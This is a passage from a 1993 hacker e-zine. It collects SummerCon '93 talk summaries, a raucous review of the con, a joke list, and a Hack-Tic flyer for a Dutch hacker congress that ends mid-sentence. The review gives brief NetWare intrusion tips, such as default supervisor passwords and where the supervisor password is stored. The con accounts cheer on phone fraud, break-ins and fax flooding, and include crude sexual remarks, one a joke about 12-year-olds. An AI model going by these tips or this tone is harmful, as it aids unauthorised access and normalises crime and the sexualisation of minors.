Israel, Australia.  The bloc countries for virii and piracy are very
busy right now, We have to wonder what will happen when they get full
access to our nets.  What happens when the eastern bloc catches
up?"

Unknown:  "Who finances this".

Stuart: "Really that's none of your business" (paraphrased <G>)

Unknown:  "Where is the evidence of these so called malicious
hackers, I think the whole malicious hacker idea is spawned by the
media to justify the persecution of hackers".

Stuart:  [Has no chance to reply]

Control-C:  (interjects) "Punk kids are all over the place doing it
man."

KL:  "its common knowledge that it is happening there."

Stu:  (offers example) Was told that at three companies have tried
to hire tiger teams, for corporate breaches however he has no proof
of this.   Yet he feels the sources were reliable.

Unknown:  "I have heard rumors that SRI is writing software to
catch hackers.  is this true?"

Stu:  Says he hasn't heard about this.  However if they are more
interested in what SRI is doing he will be  sticking around until
this afternoon or evening.  And has about 15 copies of the report that
are available to the public.

                      Next speaker

[I was out of the room for this speaker and asked Black Kat to
type this in, so your guess is as good as mine.]

Someone showed a DES encryption laptop, 8 months old, with a built in
chip to encrypt everything in and out (modem, disk, etc).  Didn't have
an overhead projector but was giving personal demos.  Made by BCC
(Beaver Computing Company) out of California.  Doesn't advertise, but
will give sales brochures etc, if you call the 800 number.
Thinks the govt is discouraging wide scale distribution.

                     Count Zero & RDT

Count Zero announced he would be talking on a unique telco
feature they found and about packet radio.  Stickers and
board adds from RDT and cDc were handed out at this time.

White Knight and Count0 started by introducing a bizarre
telco feature they came across, and played a tape recording to
demonstrate some of its features to the crowd.  After some chatter with
the rest of the con, nothing definite was concluded, however, some
good ideas are brought out.  (As well as some insight by folks who have
discovered similar systems.)

Next came some comic relief from Count0 and White Knight in the
way of the termination papers of an employee from a telco, the
employees case report was read to the crowd and essentially painted the
picture of a really disgruntled and ornery operator.  Specifics were read,
and people laughed at the shit this guy had gotten away with, end of
story.

Following this Count0 spoke for Brian Oblivion who could not be
there about an American Database/social program called America 2000.
Brian came across this information by the way of a group in Penn state,
the program is meant to monitor the attitudes of students, and how
they behave with within state standards..

Furthermore the Database is compiled without the knowledge or
permission of parents, beyond this the file can stay with a man
or woman for life, in the hands of the state.

                      Count0 on Packet Radio
                     Self-empowering Technology

Next came the actual Packet radio discussion, Count0 displayed
his hardware and talked at great length on a whole spectrum of issues
related to the radio packet switching, and some points while straying,
even the morality of the FCC.  This went on for quite some time.
Count0 instructed the crowd on the principle behind packet switch
radio as well as explaining which licenses to get and to apply.

                  Drunkfux, Merchandising

Drunkfux

Drunkfux started by, Merchandising a shitload of ho-ho con
shirts, 15$ a piece as well as mthreat his tonloc shirts, also selling the
mods for the Mistubishi 800, mthreat also had a chip preprogrammed for
the Mits 800 avail.  Those who could not get the mod were told to get it
from cypher.com in /pub/vind.  He told us of the new Metal Land revival and
said a bit about it.

Next and most interesting was the discussion of the fate of
Louis Cypher, and his companions in the recent bust.  It seems Cypher
and ALLEGED accomplices Doc and JP have been charged with numerous
felonies not which the least of is Treasury Fraud and b&e of a federal
post office.  Drunkfux went into detail on how they had been turned
on, and essentially entraped into the situation.  Also how the media as
per usual had made a witch hunt out of it by connecting Doc to the a
remote relation to the Kennedys etc, etc.

                    Eric Neilson with CPSR

Eric Nielson started by telling the crowd what had drawn him to
the CPSR, by the way of reading a discussion in congress about a
congressman defending the strength of a Starwars network by stating that the
gov had an excellent example for security: the phone networks in the
USA.  Needless to say Eric had little faith in this analogy <G>.

He went on to describe what the CPSR covers and what they have
done recently in the of the clipper debate, Sundevil and other 1st
Amend. issues.  He discussed the internal workings of CPSR and its
funding police as well as telling Conf Members how to go about joining.

                         Erik Bloodaxe

Erik started out with explaining why Phrack 43 is not yet out.
This is due to the fact that Stormking.com will not allow it to be mailed
from it, seeing as the owner does telco consulting and feels it would
be a conflict of interest.  Furthermore he won't give the listserve to
the Phrack Staff, making it somewhat difficult to distribute.  However KL
is acting as a mediator and hopefully this will be settled soon.
Mindvox was considered but rejected as a choice, for fear of people
getting a hold of the list..

On the issue of Phrack and the copyright, Erik had only ONE fed
register out of all those who collect it.  However Phrack has
obtained logs of both CERT forwarding Phrack by mail, as well as Tymnet
obtaining the mag.

Beyond this Agent Steel was discussed in an "I told you so
fashion" it turns out that him being accused of being a narc in the past
were valid, seeing it was proved by way of documentation that Agent
ratted out Kevin Poulsen (Dark Dante) resulting in his current 19
charges.

And of Course the new LOD issue was broached, however very
little was discussed on it and it was simply agreed to a large degree that
Cameron (lord Havoc) must have been seriously abused as a child to
display the type of obvious brain damage he is afflicted with now.

                       Emmanuel Goldstein 2600

Emmanuel Goldstein in his purple Bellcore shirt discussed with us
his appearance before a Congressional hearing on a panel with Don
Delaney and how the hostility shown towards him by the house
representatives in session.  Beyond this he went on to describe several
nasty letter letters sent to him by telcos for PUBLIC info he had posted
in the winter issue of 2600.  This is a very brief summary of what he had to
say, mainly due to the fact that I was too busy listening to him to
concentrate my apologies go to those who were interested in
reading the whole thing.


Next up was a lengthy discussion on Novel Software and its
weaknesses, By Erreth Akbe however the speaker he wished me to leave
this out of the transcripts so I will respect his wishes in this.

                ********End Of Transcript***********

I would like to thank the following for making the Con an
experience for me that I will not soon forget:

Arist0tle, Black Kat, Butler, Control-C, Erreth Akbe, Tommydcat,
the Public and theNot.   Thx guys.

Please send all responses to Besaville@acdm.sait.ab.ca

*****************************************************************************

Presenting :::

      SummerCon 1993 in Review !!!

Hacking Tales and Exploits by the SotMESC

Additional Activities by the GCMS MechWarriors

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

     The weather was right, too right.  Something was foul in the
air.  It was akin to that mythical 'Calm before the Storm' scenario
that is dreaded by so many.  But, Scribbles and I boarded the
Techno-Laden SotMESC compact and took off down the Highway to our
ultimate goal . . . Hacker Heaven in Summertime Fun - SummerCon !!!

     Instantly, weather was seen brewing in the Caribbean.  Hints
of Hurricanes echoed through the towns we drifted through.  To
alleviate any anxieties, massive quantities of Jolt! were obtained
in the infamous town of Hatties-Gulch, a small town taken over by
the virulent filth called College Students.

     The trip continued, over hill and over dale.  Dale was quite
considerate not to press charges.  Colleges were passed in a blink
of the eye.  Nothing was going to stop us.  We were on a mission
from the Church.  But, that's another story.

     After locating that famous arch, a beeline was made at speeds
over 100 MPH through St. Louis until our destination came into
view: The St. Louis Executive International (800-325-4850).  We
came to meet our nemesis and friends at the fest hosted by the
Missouri Programming Institute.  Brakes were quickly applied
as the car appeared to be going off the off-ramp and into the ditch.

     From the lobby it was obvious, there were unusual people here.
These were the kind of people that you fear your daughters would
never meet.  The kind of people that kicked themselves into
caffeine frenzies and would become infatuated with virtual lands.
Yes, these were my kind of people.

     Now, the adventure may start . . .

     Oh, and in response to A-Gal on pg 30 of 2600, Scribbles
says she's the sexiest hacker on the nets.  Hmmmmm, I'm inclined
to agree with that.  I'm sure Control-C will agree too, especially
after he trailed her for half of SCon.

     Now, we all know that Friday is the warm-up day on what we can
expect to see at SCon during the main Saturday drag.  It was no
surprise to find the main junction box rewired, pay-phones providing
free services, rooms rerouted and computers running rampant down the
hallways.  But, the traditional trashing of Control-C's room this
early signaled that more would be needed to top the night.  The
maid was definitely not pleased.

     For a list of those that attended, maybe KL can provide us
with that information.  There were too many faces for my fingers
to lap into.  And, there were quite a few new faces.  I believe
that Weevil was the youngest hacker at 16, and Emmanuel was the
oldest, although he didn't give his age.

     -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

                         THE CONFERENCE

     -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

     Let's get to the meat of the matter.  The conference had
a nice spacious central area with tables neatly lining alongside
the wall.  Between the tables and the walls were many hacks packed
as tightly as they could get.  Why didn't we think of moving the tables
closer together ???

     KL took control and ran the conference smoothly.  dFx panned
everyone on his digital camcorder.  Several cameras were around
to provide us with gifs later.  And the conference took off . . .


     First up was Stuart from SRI (Stanford Research Institute).
He elaborated on SRI's being involved in research, engineering and
design.  From studies done around the world with hackers and those
associated, malicious hacking can not be stopped.  There is no
evidence, though, that the current hackers are interested in
bringing the networks down at all.  Concern was given to new
hackers that may be emerging with financial gain and maliciousness
occurring.  The top security hole with system was noted as
being the infamous social engineering technique.  SRI did note
that many places did not utilize the security that they even had
in place.  It was also noted that laws against malicious hackers,
and probably any hacker, should be fair and just.  The most
malicious hacks that are turning up have been spotted in the
following named countries: Holland, Scandinavia countries,
very possibly soon in the UK, Australia, Israel, the former USSR,
and Bulgaria ( noted for virii writers ).

     A voice made mention of Operation Rahab, hackers in German Intelligence.

     Next up was Count Zero from cDc/RDT to talk about packet
radio.  His talk included information about the IESS and handed
out a flyer on America 2000 ( school under 1984 regimes ).
Maybe someone will provide us with a copy of this.  A packet
radio modem at 1200 can be obtained easily for $50.  TCP/IP
packets are already being send over the bandwidth along with
other network protocols.  The usefulness of all this is that
the information is broadcast and it is virgin territory.  The
baud limitation is due only based upon the bandwidth you are
operating at and the number of collisions occurring.  On a
band you can see every packet that is being transmitted if
you wish.  All this is located on a 2 meter band.  Currently
the FCC forbids encryptions on the airwaves, although this is
noted as being virtually impossible to enforce.   It also takes
5 months to get an amateur radio license, and your personal info
is recorded in a book easily obtained at libraries.  The problem
with going around the FCC is that there exist vigilante HAMs that
monitor the bands and have nothing better to do than filter
info and whine to the FCC.  Bandwidths are decreasing though.
This is due to an increased interest overall by communications
in these areas.  Unless you do something major the FCC will
not give you much interest.  The book on preparing yourself for
a Tech Class can be obtained from Radio Shack for $9.

     Next up was dFx.  He was promoting the HCon and Tone-Loc
t-shirts that were for sale.  Merchandising was getting pretty
high.  He also gave out a few Mitsubishi 800 disks.  He was
also recognized as the ONLY and LAST member of the Neon Knights,
a club that had a wide range of comedy names generated.  The
word was put out the HCon '93 will be in December 17-19 with
a hint that it could also wind up being in Austin.  Then the
conversation turned to Lord Byron's bust, which we should here
more information on any day this week.  The conversation
reiterated the government narc that was at the AA meeting
that was pressuring Byron.  Byron was also noted as having
rejected a plea bargain the courts offered him.  And lastly,
it is going to happen soon so get them while you can.  The
FTP site at eff.org will be dropping its CuD directory due
to a conflict of interest with EFFs major contributors, mainly
the RBOCs and other interest groups that don't like us.

     Erik Bloodaxe took the table next to talk about what
was happening with his involvement with Phrack and some
interesting info about Agent Steel.  As for Phrack, the
Email list is being with-held by Tuc.  The mailing list
has been refused at Mindvox due to files missing mysteriously
at that site.  And, no organization registered for Phrack #42
since it was copyrighted with a nice and lengthy preamble,
except for one company from Mitre.  Currently Phrack #43 is
in limbo and is estimated at 1 Meg long.  Going onto the
info about Agent Steel, basically he's a narc.  Lord Havok from
Canada is trying to restart the LOD under some unknown
logical rationale that since LOD is defunct, anyone can
reclaim the name.  Lord Havoc, aka Cameron, has been going
around trying to get documentation to put together an LOD
technical journal #5.  Supposedly there is a skin-head group
in Canada that in now tracking Cameron down.

     Someone came up next [Minor Threat] and gave us an update on
Codec.  Two weeks after the last SCon, Codec was pulled over while
on the run from the law for speeding and then arrested for
burglary, resisting arrest, etc . . .  He is estimated to
be out of jail in 1995 and still has time to serve in a few
other states.  Mail can be sent to him at this address:
codec@cypher.com.  Maybe Crunch can give Codec some hints on
how to get by in prison?

       From the CPSR, Eric Nielson took the table.  He elaborated
on the CPSR and ran a Q&A period.  Basically, the CPSR files many
FOIA requests and sues the government.  Their focus is on the
workplace computing.  Elaboration was given on the Clipper Chip
and computer ship security.  The CPSR is staffed with lawyers
and takes their funding from dues and grants.  They are not
sponsored by any corporations.

     From the far side of the table came the infamous Emmanuel
Goldstein from 2600.  He stated how he had testified at congress and
gave them a live demonstration of bandwidth scanning and redboxing.
While he was there, the inquisition started against him on the
issue of 2600.  Emmanuel then tried to explain the culture to
our representative that it is bad to classify all hackers as
criminals.  Goldstein then went on to talk about the DC 2600 bust
and how it has resulted in 2600 meetings springing up all across
the country.  A review of several films on software piracy at
the office, disaster recovery and viruses from Commonwealth
Films was given.  And, to highlight everything, 2600 has purchased
an AT&T van that they plan to take to assorted conventions and
start a fleet of these up.

     Pst, BTW, on pg 43 of 2600 the intersection should be a jump =:)

     Last up was Erreth Akby, a Certified Netware Engineer.  He
explained that the only upgrade in Novell 4.0 is the disk compression.
He also informed us that the supervisor and guest accounts generally
have default passwords.  TO hack into this Net, you should use a PC
with full alt and functions keys.  The supervisor p/w is on the
RConsole in a file called autoexec.mcf on version 3.11.  Netcrack
will not work on a system with Intruder Lock-Out.  Non-dedicated
netware must boot from a floppy.  Best of all, you can dial out
by using cubix-quarts, which are PC with modems on the system.

     Below is a quick reprint of a paper that was recovered
from Control-C's trashed room.

Mrs Jasnagan,

     I would like to set up a meeting
to discuss Kevin's progress in Social
Studies and English.  Please let
me know when it would be
convenient.

                 Thank you

                      ( Scribble , scribble )

Dear Mr + Mrs Gormby,

     We would be happy
to meet with you at
9:30 on Thursday, April
1st in Room 104

                     Sincerely,
                         M.Jarnagin
                            &
                         S.Dietrich


     Now, could this be Kevin Poulson ???  Naaa, no way.
Amazing what technical data trashing will uncover.  I guess
I should throw this away now . . .

     After the convention, there was much rejoicing.  The reasons
would become fairly obvious as a 'swingers party' sign was soon
located outside one of the hotel wings.  Yes, it would be a very
good convention.

     Several people made their way to the vehicles for a long
night of trashing and raiding of the various FedEx, UPS and
other assorted boxes around town.  Other groups made their
way to computers that were trying to connect with anything
they could out in town.  There were also those that reluctantly
went to the mall to take advantage of the local population.

     What did not happen ???  Control-C did not get laid, but
it was rumored that there were a few 12-year olds wandering
around the hotel looking for this legendary hacker.  No deaths
had occured, the fires were kept to a minimum and nothing major
was noted as being broken.

     One thing was for sure, there were a lot of alcoholic
beverages going around, walkie-talkies, scanners, and wild
tales.  Several area buildings were broken into, but nothing
major was done.

     Then the shit hit the fan.  It seems several hackers had riled
the swingers into a frenzy.  I guess the swingers couldn't swing
with it.  What happened ???  Phones went ringing room to room and
radios blared to life that the cops were here !!!  At count, there
were 6 cops, 1 sheriff and 4 hotel employees that started patrolling
the hallways.  Yes, we were under room arrest at our own convention
in our own wing.  Anyone that left there room was told to stay there
or they would be arrested.  The cops were very insistent that no
pictures were to be taken.  The swingers had broken our balls.

     But, this would not stop us.  Soon, there was a phone network
going on with radio interfaces.  The windows opened and a few migrated
to other locations of the hotel.  After a while, the authorities left
feeling satisfied that they had intimidated us.  They didn't.

     After they left, the hallways erupted again.  In the SotMESC
room a gathering turned out to watch several techno-infested
videos.  At the cDc room were others viewing the HoHoCon '92 film
that dFx brought down with him.  At one point, the microwave
around the lobby was detonated and a mysterious stack of Credit
Card carbons was found.  The liberated phones were being
utilized to their full international extent, and several of the
soda machines decided to give out a few free drinks.

     But, we couldn't leave well enough alone.  Sir Lance went
to the lobby and took a picture of the hotel Asst. Manager.
I guess this guy didn't like his photo being taken, since he
turned around and called the cops on Sir Lance.  Down the hallway
the cops came, dragging Sir Lance back with them.  In the end,
the cops explained to the Asst. Manager that it was not a crime
in the US to take pictures of people.

     In another related story, Kaos Wizard wound up calling the
SotMESC room with a wild plea for help.  It seemed he was with
a large group of trashers that included Albatross, Intrepid,
Forced Entry, Zippy, The Public and more.  Kaos was at a Central
Office close to the hotel on Woodson and needed help.  He had
taken off to take a piss and noticed that the trashers were
surrounded by cops when he returned.  There was no way he was going
back with all those cops there ( and, might I mention, there was
also a police dog ).  Mystic Moos gathered up a few people and
went to rescue Kaos Wizard as the rest of the trashers returned
to the hotel.  It seems they had eluded the cops by telling them
that they were waiting for their friend to return from taking
a bathroom break ( Kaos Wizard ).  Unfortunately, he never
returned.  The cops let them go eventually.  Mystic Moos rescued
Kaos Wizard, and the hotel was aglow in activity again.

     Control-C came down the hall at one point to make a startling
discovery.  It seems that at a local club there was a band playing
that featured 'Lex Luthor'.  The elusive X-LOD founder had been
located.  AFter some thought, it was decided he could stay there
and sing the blues while the rest of us partied the night away.

     For those interested, the hotel fax is 314-731-3752.

     One of the police officers detaining us was S.M. Gibbons.

     IBM will send a 36 page fax to the number you give them.
To activate, call 1-800-IBM-4FAX.  As you can imagine, it wasn't
long before the hotels fax ran out of thermal paper.

     Below is a gathering of Flyers . . .

HoHoCon '92 Product Ordering Information

If you are interested in obtaining either HoHoCon shirts or videos,
              please contact us at any of the following:

             drunkfux@cypher.com
             hohocon@cypher.com
             cDc@cypher.com
             dfx@nuchat.sccsu.com
             359@7354 (WWIV Net)

                    HoHoCon
               1310 Tulane, Box #2
                 Houston, Tx
                  77008-4106

                713-468-5802 (data)

The shirts are $15 plus $3 shipping ($4 for two shirts).  At this
time, they only come in extra large.  We may add additional sizes if
there is a demand for them.  The front of the shirt has the following
in a white strip across the chest:

                   I LOVE FEDS

( Where LOVE = a red heart, very similar to the I LOVE NY logo )

                 And this on the back:

                   dFx & cDc Present

                    HoHoCon '92

                  December   18-20
                  Allen Park Inn
                  Houston, Texas

There is another version of the shirt available with the following:

                  I LOVE WAREZ

The video includes footage from all three days, is six hours long and
costs $18 plus $3 shipping ($4 if purchasing another item also).
Please note that if you are purchasing multiple items, you only need
to pay one shipping charge of $4, not a charge for each item.  If
you wish to send an order in now, make all checks or money orders
payable to O.I.S., include your phone number and mail it to the street
address listed above.  Allow a few weeks for arrival.

Thanks to everyone who attended and supported HoHoCon '92.  Mail us if
you wish to be an early addition to the HoHoCon '93 (December 17-19)
mailing list.



       Calvary                         Black Crawling Systems
       617-267-2732                    617-482-6356

                     ATDT EAST
                   617-350-STIF

         DemOnseed sez: "Call ATDT East or I'll crush your skull"

                                       Home of -= RDT...


Trailings to follow . . .  Slug, slug, slugfest . . .

Join the ranks of the Cons: HoHoCon, MardiCon, SummerCon !!!

****************************************************************************

            Top 25 Things I Learned at SummerCon '93
                --------------------------------
                          By Darkangel


     SummerCon is a place where many hackers from all over the
world meet to discuss the current state of hacking today, and to
drink themselves under the table.  Every year, pages and pages of
useful information is passed and traded among the participants.
In this brief summery, I will attempt to point out the things
that I learned and I thought were the most helpful to the whole
hacker community. I hope you enjoy it.

     #1)  DON'T let Control-C within 15 feet of any person that
     does not have a penis.

     #2)  Knight Lightning will have a stroke before the age of
     30.

     #3)  French Canadians ALWAYS sound drunk.

     #4)  Loops do not make good pickup lines.

     #5)  The Zenith is outside the window.  Just look up.

     #6)  Smoking certain herbs is still illegal in St. Louis.

     #7)  If you see a taxi and think it might be a cop, it
     probably is.

     #8)  Hotel Security is worse than Mall Security.

     #9)  The payphones in the lobby are not meant to be free.

     #10)  Do not climb through the ceiling to get to the room
     with the PBX in it.

     #11)  Do not glue the locks shut on an entire floor of the
     hotel. (especially when people are in them)

     #12)  This machine is broken.

     #13)  Do not dump bags you got trashing on the floor of
     someone else's room.

     #14)  St. Louis police do not appreciate the finer points of
     Simplex lock hacking.

     #15)  VaxBuster should never be allowed to drink Everclear.

     #16)  Scribbles has a very nice ass.

     #17)  Do not photograph Pakistani hotel security guards.

     #18)  Do not try to bring a six pack through customs.

     #19)  Loki is the Fakemail God.

     #20)  Do not rip the phone boxes out of the walls and cut
     the wires.

     #21)  Barbie Doll pornos can be cool.

     #22)  Frosty can do weird things with techno and movies.

     #23)  Always remove the mirrors from the walls to check for
     hidden cameras.

     #24)  Do not threaten or harass other people staying at the
     same hotel.  This can be bad.

     #25)  I really don't think the hotel will let us come back.

     That wraps it up!  See you at HoHoCon!

                                       -Darkangel

***************************************************************************

                             Hack-Tic Presents

                               H A C K I N G

                          at the   E N D   of the

                              U N I V E R S E

                   1993 SUMMER CONGRESS, THE NETHERLANDS

=========================================================================

HEU?

Remember the Galactic Hacker Party back in 1989? Ever wondered what
happened to the people behind it? We sold out to big business, you
think. Think again, we're back!

That's right. On august 4th, 5th and 6th 1993, we're organizing a
three-day summer congress for hackers, phone phreaks, programmers,
computer haters, data travellers, electro-wizards, networkers, hardware
freaks, techno-anarchists, communications junkies, cyberpunks, system
managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez
dudes, law enforcement officers (appropriate undercover dress required),
guerilla heating engineers and other assorted bald, long-haired and/or
unshaven scum. And all this in the middle of nowhere (well, the middle
of Holland, actually, but that's the same thing) at the Larserbos
campground four meters below sea level.

The three days will be filled with lectures, discussions and workshops
on hacking, phreaking, people's networks, Unix security risks, virtual
reality, semafun, social engineering, magstrips, lockpicking,
viruses, paranoia, legal sanctions against hacking in Holland and
elsewhere and much, much more. English will be the lingua franca for
this event, although one or two workshops may take place in Dutch.
There will be an Internet connection, an intertent ethernet and social
interaction (both electronic and live). Included in the price are four
nights in your own tent. Also included are inspiration, transpiration, a
shortage of showers (but a lake to swim in), good weather (guaranteed by
god), campfires and plenty of wide open space and fresh air. All of this
for only 100 dutch guilders (currently around US$70).

We will also arrange for the availability of food, drink and smokes of
assorted types, but this is not included in the price. Our bar will be
open 24 hours a day, as well as a guarded depository for valuables
(like laptops, cameras etc.). You may even get your stuff back! For
people with no tent or air mattress: you can buy a tent through us for
100 guilders, a mattress costs 10 guilders. You can arrive from 17:00
(that's five p.m. for analogue types) on August 3rd. We don't have to
vacate the premises until 12:00 noon on Saturday, August 7 so you can
even try to sleep through the devastating Party at the End of Time
(PET) on the closing night (live music provided). We will arrange for
shuttle buses to and from train stations in the vicinity.

HOW?

Payment: in advance please. Un-organized, poor techno-freaks like us
would like to get to the Bahamas at least once. We can only guarantee
you a place if you pay before Friday June 25th, 1993. If you live in
Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention
'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic,
Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere:
call, fax or e-mail us for the best way to get the money to us from your
country. We accept American Express, we do NOT cash ANY foreign cheques.

HA!

Very Important: Bring many guitars and laptops.

ME?

Yes, you! Busloads of alternative techno-freaks from all over the
planet will descend on this event. You wouldn't want to miss that,
now, would you?

Maybe you are part of that select group that has something special to
offer! Participating in 'Hacking at the End of the Universe' is
exciting, but organizing your very own part of it is even more fun. We
already have a load of interesting workshops and lectures scheduled,
but we're always on the lookout for more. We're also still in the
market for people who want to help us organize during the congress.

In whatever way you wish to participate, call, write, e-mail or fax us
soon, and make sure your money gets here on time. Space is limited.

SO:

- 4th, 5th and 6th of August

- Hacking at the End of the Universe
  (a hacker summer congress)

- ANWB groepsterrein Larserbos
  Zeebiesweg 47
  8219 PT  Lelystad
  The Netherlands

- Cost: fl. 100,- (+/- 70 US$) per person
  (including 4 nights in your own tent)

MORE INFO:

Hack-Tic
Postbus 22953
1100 DL  Amsterdam
The Netherlands

tel     : +31 20 6001480
fax     : +31 20 6900968
E-mail  : heu@hacktic.nl

VIRUS:

If you know a forum or network that you feel this message belongs on,
by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC,
WP.BAT, you name it. Spread the worm, uh, word.
=========================================================================

SCHEDULE

day 0       August 3rd, 1993
=====
16:00       You are welcome to set up your tent
19:00       Improvised Dinner

day 1       August 4th, 1993
=====
11:00-12:00 Opening ceremony
12:00-13:30 Workshops
14:00-15:30 Workshops
15:30-19:00 'Networking for the Masses'     16:00-18:00 Workshops
19:00-21:00 Dinner
21:30-23:00 Workshops


day 2       August 5th, 1993
=====
11:30-13:00 Workshops
14:00-17:00 Phreaking the Phone             14:00-17:00 Workshops
17:30-19:00 Workshops
19:00-21:00 Dinner


day 3       August 6th, 1993
=====
11:30-13:00 Workshops
14:00-18:00 Hacking (and) The Law           14:00-17:00 Workshops
18:00-19:00 Closing ceremony
19:00-21:00 Barbeque
21:00-??:?? Party at the End of Time (Live Music)

day 4       August 7th, 1993
=====
12:00       All good things come to an end

=========================================================================

'Networking for the masses',   Wednesday August 4th 1993, 15:30

One of the main discussions at the 1989 Galactic Hacker Party focused on
whether or not the alternative community should use computer networking.
Many people felt a resentment against using a 'tool of oppression' for
their own purposes. Computer technology was, in the eyes of many,
something to be smashed rather than used.

Times have changed. Many who were violently opposed to using computers
in 1989 have since discovered word-processing and desktop publishing.
Even the most radical groups have replaced typewriters with PCs. The
'computer networking revolution' has begun to affect the alternative
community.

Not all is well: many obstacles stand in the way of the 'free flow of
information.' Groups with access to information pay such high prices for
it that they are forced to sell information they'd prefer to pass on for
free. Some low-cost alternative networks have completely lost their
democratic structure. Is this the era of the digital dictator, or are we
moving towards digital democracy?

To discuss these and other issues, we've invited the following people
who are active in the field of computer networking: [Electronic mail
addresses for each of the participants are shown in brackets.]

Ted Lindgreen (ted@nluug.nl) is managing director of nlnet. Nlnet is the
largest commercial TCP/IP and UUCP network provider in the Netherlands.

Peter van der Pouw Kraan (peter@hacktic.nl) was actively involved in the
squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas
about technology and its relation to society. Had a PC all the way back
in 1985!

Maja van der Velden (maja@agenda.hacktic.nl) is from the Agenda
Foundation which sets up and supports communication and information
projects.

Joost Flint (joost@aps.hacktic.nl) is from the Activist Press Service.
APS has a bbs and works to get alternative-media and pressure groups
online.

Felipe Rodriquez (nonsenso@utopia.hacktic.nl) is from the Hack-Tic
Network which grew out of the Dutch computer underground and currently
connects thousands of people to the global Internet.

Andre Blum (zabkar@roana.hacktic.nl), is an expert in the field of
wireless communications.

Eelco de Graaff (Eelco.de.Graaff@p5.f1.n281.z2.fidonet.org) is the
nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the
founders of the Dutch Fidonet Foundation.

Michael Polman (michael@antenna.nl) of the Antenna foundation is a
consultant in the field of international networking. He specialises in
non-governmental networks in the South.

Alfred Heitink (alfred@antenna.nl) is a social scientist specializing in
the field of computer-mediated communication as well as system manager at
the Dutch Antenna host.

Rena Tangens (rena@bionic.zer.de), was involved in the creation of the
Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network.
She is an artist and wants to combine art and technology.

The discussion will be led by freelance radiomaker and science
journalist Herbert Blankesteyn. He was involved in the 'Archie'
children's bbs of the Dutch VPRO broadcasting corporation.
=========================================================================

'Phreaking the Phone',   Thursday August 5th 1993, 14:00

Your own telephone may have possibilities you never dreamed possible.
Many years ago people discovered that one could fool the telephone
network into thinking you were part of the network and not just a
customer. As a result, one could make strange and sometimes free
phonecalls to anywhere on the planet. A subculture quickly formed.

The phone companies got wise and made a lot of things (nearly)
impossible. What is still possible today? What is still legal today?
What can they do about it? What are they doing about it?

Billsf (bill@tech.hacktic.nl) and M. Tillman, a few of the worlds best
phreaks, will introduce the audience to this new world. Phone phreaks
from many different countries will exchange stories of success and
defeat. Your life may never be the same.
=========================================================================

'Hacking (and) The Law',   Friday August 6th, 14:00

You can use your own computer and modem to access some big computer
system at a university without the people owning that computer knowing
about it. For years this activity was more or less legal in Holland: if
you were just looking around on the Internet and didn't break anything
nobody really cared too much...

That is, until shortly before the new computer crime law went into
effect. Suddenly computer hackers were portrayed as evil 'crashers'
intent on destroying systems or, at least, looking into everyone's
files.

The supporters of the new law said that it was about time something was
done about it. Critics of the law say it's like hunting mosquitoes with
a machine-gun. They claim the aforementioned type of hacking is not the
real problem and that the law is excessively harsh.

To discuss these issues we've invited a panel of experts, some of whom
are, or have been, in touch with the law in one way or another.

Harry Onderwater (fridge@cri.hacktic.nl), is technical EDP auditor at the
Dutch National Criminal Intelligence Service (CRI) and is responsible for
combatting computer crime in the Netherlands. He says he's willing to
arrest hackers if that is what it takes to make computer systems secure.

Prof. Dr. I.S. (Bob) Herschberg (herschbe@dutiws.twi.tudelft.nl), gained
a hacker's control over his first system 21 years ago and never ceased
the good work. Now lecturing, teaching and publishing on computer
insecurity and imprivacy at the technical university in Delft. His
thesis: 'penetrating a system is not perpetrating a crime'.

Ronald 'RGB' O. (rgb@utopia.hacktic.nl) has the distinction of being the
only Dutch hacker arrested before and after the new law went into effect.
He is a self-taught UNIX security expert and a writer for Hack-Tic
Magazine.

Ruud Wiggers (ruudw@cs.vu.nl), system manager at the Free University
(VU) in Amsterdam, has for 10 years been trying to plug holes in system
security. He was involved in the RGB arrest.

Andy Mueller-Maguhn (andy@cccbln.ccc.de) is from the Chaos Computer Club
in Germany.

Eric Corley (emmanuel@eff.org) a.k.a. Emmanuel Goldstein is editor
of the hacker publication '2600 magazine'. The first person to realize
the huge implications of the government crackdown on hackers in the US.

Winn Schwartau (wschwartau@mcimail.com) is a commercial computer
security advisor as well as the author of the book 'Terminal
Compromise'. His new book entitled 'Information Warfare' has just been
released.

Ray Kaplan (kaplan@bpa.arizona.edu) is a computer security consultant.
He is constantly trying to bridge the gap between hackers and the
computer industry. He organizes 'meet the enemy' sessions where system
managers can teleconference with hackers.

Wietse Venema (wietse@wzv.win.tue.nl) is a systems expert at the
Technical University in Eindhoven. He is the author of some very well
known utilities to monitor hacking on unix systems. He has a healthy
suspicion of anything technical.

Peter Klerks (klerks@rulfsw.leidenuniv.nl) is a scientist at the centre
for the study of social antagonism at the Leiden University. He has
studied the Dutch police force extensively, and is author of the book
'Counterterrorism in the Netherlands.'

Don Stikvoort (stikvoort@surfnet.nl), one of the computer security
experts for the Dutch Academic Society and chairman of CERT-NL (Computer
Emergency Response Team). He is also actively involved in SURFnet
network management.

Rop Gonggrijp (rop@hacktic.nl) was involved in some of the first
computer break-ins in the Netherlands during the 80's and is now editor
of Hack-Tic Magazine.

The discussion will be led by Francisco van Jole (fvjole@hacktic.nl),
journalist for 'De Volkskrant'.
=========================================================================

WORKSHOPS

HEUnet introduction
   an introduction to the Hacking at the End of the Universe network.

Jumpstart to VR, 3D world-building on PC's
   Marc Bennett, editor of Black Ice magazine, will explain how to
   design worlds on your own PC which can be used in Virtual Reality
   systems.

Replacing MS/DOS, Running UNIX on your own PC
   People who are already running unix on their PCs will tell you what
   unix has to offer and they'll talk about the different flavours in
   cheap or free unix software available.

Unix security
   RGB and fidelio have probably created more jobs in the unix security
   business than the rest of the world put together. They'll talk about
   some of the ins and outs of unix security.

E-mail networking
   Should we destroy X400 or shall we let it destroy itself?

'User Authorization Failure'
   A quick introduction to the VAX/VMS Operating System for those that
   consider a career in VMS security.

'The right to keep a secret'
   Encryption offers you the chance to really keep a secret, and
